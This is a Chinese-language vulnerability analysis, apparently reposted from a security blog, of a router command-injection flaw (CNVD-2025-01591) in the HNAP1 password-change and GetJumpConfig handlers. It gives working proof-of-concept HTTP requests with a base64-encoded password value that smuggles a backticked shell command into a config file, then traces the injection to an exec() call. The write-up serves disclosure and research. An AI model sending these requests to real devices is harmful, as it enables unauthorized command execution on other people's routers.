0Day CNVD-2025-01591 某路由器未授权命令执行漏洞分析

2025年3月6日19:51:14评论28 views字数 2336阅读7分47秒阅读模式

Part1

漏洞状态

漏洞细节	漏洞PoC	漏洞EXP	在野利用
有	有	无	未知

Part2

漏洞描述

‍漏洞名称	0Day 某路由器未授权命令执行漏洞
CVE编号	CNVD-2025-01591
漏洞类型	命令执行
漏洞等级	7.1 高危 (High）
公开状态	未公开
时间线	报送时间2024-12-04 收录时间2025-01-16 更新时间2025-01-22

Part3

漏洞验证

1. 验证环境

路由器模拟器：192.168.0.1

2. 验证过程

登录路由器后台。修改密码

0Day CNVD-2025-01591 某路由器未授权命令执行漏洞分析

拦截数据包

new_password、confirm_password参数修改为QUFBQUFBQUFNVEl6TkRVMk56Z25DbTl3ZEdsdmJpQjNhWHBoY21RZ0p6SmdiSE0rZEdWemRDNTBlSFJnSndwdmNIUnBiMjRnYVc1bWIzSWdKekE9

POST /HNAP1/ HTTP/1.1Host: 192.168.249.191Content-Length: 337SOAPACTION: "http://purenetworks.com/HNAP1/SetPasswdSettings"Accept: application/jsonContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8Cookie: PHPSESSID=584a37c5c6724ee3a68d020ae8260495; uid=toLlRvK3; PrivateKey=E1F124840D40179A49FAAE12763348DE; timeout=5Connection: close{"SetPasswdSettings":{"current_password":"RUZyWkhGQlRNVEl6TkRVMk56Zz0=","new_password":"QUFBQUFBQUFNVEl6TkRVMk56Z25DbTl3ZEdsdmJpQjNhWHBoY21RZ0p6SmdiSE0rZEdWemRDNTBlSFJnSndwdmNIUnBiMjRnYVc1bWIzSWdKekE9","confirm_password":"QUFBQUFBQUFNVEl6TkRVMk56Z25DbTl3ZEdsdmJpQjNhWHBoY21RZ0p6SmdiSE0rZEdWemRDNTBlSFJnSndwdmNIUnBiMjRnYVc1bWIzSWdKekE9"}}

0Day CNVD-2025-01591 某路由器未授权命令执行漏洞分析

发送另一个数据包触发漏洞

POST /HNAP1/ HTTP/1.1Host: 192.168.0.1Content-Length: 20SOAPACTION: "http://purenetworks.com/HNAP1/SetPasswdSettings"Accept: application/jsonContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8Cookie: PHPSESSID=584a37c5c6724ee3a68d020ae8260495; uid=toLlRvK3; PrivateKey=E1F124840D40179A49FAAE12763348DE; timeout=5Connection: close{"GetJumpConfig":{}}

访问http://192.168.0.1/HNAP1/test.txt

0Day CNVD-2025-01591 某路由器未授权命令执行漏洞分析

Part4

漏洞分析

PHP语言存在许多危险函数，如eavl、exec等，通过代码审计发现使用了高危函数exec。

在GetJumpConfig.php文件中。

第18行使用了exec高危函数，且直接拼接data参数变量。

第17行data变量由$result['Wizard_value']获取。

第16行get_option_info函数只是处理system_info变量。

第9行，通过read_cfg_info函数读取数据。

在read_cfg_info函数中可以看到读取的是数据为/etc/config/my_system。

寻找修改/etc/config/my_system数据的代码。

在SetPasswdSettings.php文件中找到了写入my_system的代码。

第35行，login_cfg_info写入数据到/etc/config/my_system。

第34行，处理new_password数据得到login_cfg_info

第21行，获取用户提交的new_password参数。

功能点在用户修改密码的地方。

0Day CNVD-2025-01591 某路由器未授权命令执行漏洞分析

Part5

修复缓解建议

厂商暂未发布修复措施解决此安全问题，建议使用此设备的用户随时关注厂商主页或参考网址以获取解决办法：

https://www.dlink.com/en/security-bulletin

原文始发于微信公众号（安帝Andisec）：0Day CNVD-2025-01591 某路由器未授权命令执行漏洞分析

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

0Day CNVD-2025-01591 某路由器未授权命令执行漏洞分析

【VulnHub靶场】超全详解DC-9提权渗透

域渗透-PTH

基于人工智能（AI ）的未来战场响应技术：用于多域作战（MDO）创新（万字干货）

实战|SQL注入漏洞

heapdump未经授权漏洞利用

从侦察到利用EWS错误配置绕过OWA中的MFA实施

合约安全之Uniswap基础学习

ClassPathXmlApplicationContext不出网利用学习

NetSupport RAT远控样本分析

快速水CVE编号指南

发表评论

在线咨询

微信